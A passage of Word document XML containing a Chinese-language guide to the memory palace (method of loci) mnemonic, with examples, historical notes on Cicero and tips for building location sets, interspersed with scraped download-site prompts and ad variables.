          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C0370A" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在你是你宫殿的主人，可以好好利用它了。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00C0370A" w:rsidP="00C0370A">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>就像大部分的记忆增强方式一样，记忆宫殿法通过形象化的联想起作用。过程很简单：你选择一个已知的图像——称为记忆挂钩——和你想记住的要素结合起来。对我们来说，一</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个记忆挂钩就是我们记忆宫殿里的一个明显的特征物。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记忆挂钩方法就是“改善记忆：讲你大脑的语言”这篇文章里描述的方法，如果你还没看过它，强烈荐。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>根据那篇文章的描述，形象化联想的正确方式是：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>疯狂的、滑稽的、讨厌的、不同寻常的、超凡脱俗的、生动的、荒谬的——总之，就是那些容易被记住的东西，不是吗？把场景营造得独一无二，在真实生活中永远不会发生。唯一的规则：乏味就是错。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>虽然这个技巧能记住大量信息，先让我们从简单的开始：用“家”这个记忆宫殿来记购物清单。假设清单上的第一项是“腌肉”。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>让思维送你去你的记忆宫殿。你在头脑中看见的第一个特征物是你家的大门。现在，用一种滑稽的方法，把“腌肉”和你家大门的样子形象化地结合起来。比如想象巨大的腌肉条像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>B</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>级片的僵尸一样从门下涌出来伸向你的腿，这样如何？去感受“腌肉手”在你腿上的触感。去感受那该死的邪恶的腌肉味。这够让人印象深刻吧？</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>现在打开门，沿着你已经确定的那条路线继续走。看到的下一个特征</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>物，把它和要记忆的下一项联系起来。比如下一项是“蛋”，而第二个特征物是“丈母娘的照片”。很好，在这点上你知道该怎么做</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>„„</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="楷体" w:hAnsi="楷体" w:cs="楷体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>程序都是一样的，只要保持头脑中的画面联想，直到搞定所有要记的项目。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>参观你的宫殿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>到这一个步骤，你已经记住了那些项目。但如果你是个新手，你可能还需要做一点复习，至少要把行程在头脑中演练过一次。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>    </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果你从同样的地方开始并遵循同样的路线，每当你看到途中选定的特征物时，要记的东西就会瞬间浮现。路线从出发到结束，注意那些特征物，并且在脑中重演场景。当你的行程终结，转过身从反方向走回你的出发点。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>     </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下面就是考验你的形象思维能力了。你越放松就这事越容易，你就能记得越好。记忆宫殿记忆法（和其他的挂钩方法）在于它们不但非常有效，而且学起来、用起来都很有趣。只需要一点经验，你用记忆宫殿记住的目录会鲜活地存在于头脑中很多天、很多周甚至更加长久。要知道，你想要多少宫殿就能创造多少个，或简单或精致都如你所愿。它们每一个都是一家“记忆银行”，随时准备好帮你记住任何事。客观场所和思维概念的联系是我所知的最强有力的记忆组合。其他大多数记忆技巧（通常比记忆宫殿复杂得多）的原理，至少有部分是使用客观场所作为记忆挂钩。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>二、什么是记忆宫殿？揭秘记忆宫殿里的奥秘</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>记忆宫殿这种技巧其实也不算什么稀罕事物。好多记忆方法的书都有涉及到，只是大家不叫“记忆宫殿”，而通常采用定桩法、地点法之类的称呼。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在日常生活中很多事物都太琐碎、太普通，没什么奇特之处，记忆起来就很困难。如果我们见到或听到什么特别粗俗的事情，或者一些稀奇古怪、伟大、匪夷所思或令人捧腹的东西，那就很有可能会牢牢地记住它们。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>记忆术的最基本原则：精细编码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D"/>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D"/>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D"/>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D"/>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载文档到电脑，查找使用更方便</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载券</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  220</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>人已下载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D"/>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D"/>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>下载</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D"/>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D"/>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D"/>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D"/>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>还剩</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>页未读，继续阅读</w:t>
      </w:r>
    </w:p>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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>定制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>HR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最喜欢的简历</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D"/>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我要定制简历</w:t>
      </w:r>
    </w:p>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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>我们比较容易记住视觉图像</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>相比其它信息而言，视觉图像是比较容易记忆的。因此，“记忆术的秘诀就在于形成一种联觉记忆方式：把大脑不容易记住的信息类型转化为擅长信息类型”。所以，所谓的“精细编码”就是把将要进入记忆的那些枯燥的信息转化为富有色彩和超级有趣的信息。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>2. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>能联想起来的细节越多越好。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>尽可能是全方位的细节，视觉、味觉、听觉、触觉。通俗点讲，记忆就是在大脑中刻下印痕，这个联想的过程越具体、细节越多，印痕就越深。当然，除了这些，联想还有其它的要点，比如：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>《修辞学》是古罗马时期西塞罗的著作，被奉为记忆学上的经典。事实上后世记忆技巧方面的理论或多或少都到了它的影响。他建议读者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>„„</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="楷体" w:hAnsi="楷体" w:cs="楷体" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>要尽可能地注意细节，尽可能有趣一些、粗俗一些、奇特一些。在大脑中想像各种图像的时候，图像越粗俗越能帮助记忆。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>《修辞学》的建议还包括：想像出一些“特别漂亮或者特别丑陋”的图像，然后让它们动起来，或者把它们装饰一下，让它们看起来更醒目一些。与没有生命的图像相比，人们更容易记住有生命的图像。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>正所谓“磨刀不误砍柴工”，要想像出这些奇怪的场景，需要花费更多的精力。但这一切的投入都会有丰厚的回报。因为在消耗这些精力的过程中，大脑中的神经元就会形成更多稳固的联系。换句话说，“印痕”会变得更深，所记忆的内容也更容易在大脑中再现。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“记忆宫殿”是一种古老的记忆术。西塞罗曾经利用它记忆他的演讲内容。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“很多事情都会从记忆中溜走，除非这件事情被重复记忆很多遍”要</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>想使学习到的知识真正成为自己的东西，复习是必由之路。重复很重要，但对于现在这个信息量极速膨胀的时代，如何用科学的重复去掌握知识更为重要。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“他发现，把那些没有任何意义的信息过滤成有意义的信息后，他对这些信息的记忆就会很牢固。”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这里介绍到了一种很重要的记忆技巧，就是把那些乍看之下没有意义的信息改造成有意义的内容，这样，记忆所需的成本（主要是时间，其次是脑力）便会大大降低。举个最最简单的例子，比如背圆周率，如果用谐音的方法，明显会轻松许多：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>山巅一寺一壶酒（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3.14159</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），尔乐苦煞吾（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>26535</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），把酒吃（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>897</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>），酒杀尔（</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>932</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>“我们记不住孤立的事实，只能记住有联系的事实。”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个，便可算是记忆的秘诀了。比如记不住单词？把它跟熟词关联起来，串接出一个奇特有趣甚至怪诞的画面，这样，原来孤零零存在的单词不再孤单了，因为它跟熟词有了联系，在你回忆它的时候，这个画面会帮到你。而且，每忆起这个画面，记忆的烙印便会加深一层，学习效果自会大幅度提升。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>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r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        var cpro_psid = "u2787156";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:t xml:space="preserve">        var cpro_pswidth = "966";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:t xml:space="preserve">        var cpro_psheight = "120";</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
    </w:p>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r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>三、建立属于你自己的记忆宫殿</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地点法也叫罗马房间法或者黄金宫殿法则。就是我们在自己的脑海当中建立一套自己的记忆宫殿，帮助我们在记忆一些杂乱或者长篇的信息时可以记得有快又准。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>地点要怎么找呢？其实地点是不用去找的，如果想要用的时候再去找就晚了。其实地点早就在我们的大脑当中了。只是我们平时没有整理而已，就像是我们的房间有一堆杂乱无章书籍和柜子一样。只要我们把柜子整理好，把书籍按照不同的类型放在各个抽屉里，再贴上标签。以后我们想看什么书就去那里拿，方便又快捷。现在我们就一起来整理一下我们大脑里的“柜子”吧！</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>这个“柜子”就是我们大脑里的记忆宫殿的地点。我们从小到大去过无数的地方，只要我们稍微整理一些我们记忆深刻的地方就很多了。例如：我们经常走过的街道，学校，同学家，亲戚朋友家，附近的超市，公园，图书馆，甚至是旅游的风景点等等。我们把它们按照一定的地理位置排序：可以按照从南到北的路线，例如：从海南岛到北京。也可以从自己家到某某家。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>排好顺序就开始写地点；每组地点最好只写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>20-30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个，不要贪多，多了就会混乱，成为记忆的障碍。我本人是每组</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个地点，拿个本子分</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列写，从上往下写，一面纸可以写</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>列。如果是房间的地点我都是从大门开始，按照顺时针方向写，写满</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>30</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个一组。多出来的我就把它放到下一组，就算下一组不是同一家的也没关系。写完自己家里的地点可能下一组是某同学家，我也把那自己家那几个剩下的地点放在同学家地点的前面。同学家的地点同样是大门开头，按照顺时针方向写下去。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>  </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D4623D" w:rsidRDefault="00D4623D" w:rsidP="00D4623D">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>找记忆宫殿的时候有</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>个必须注意的点：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>顺序一致；</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
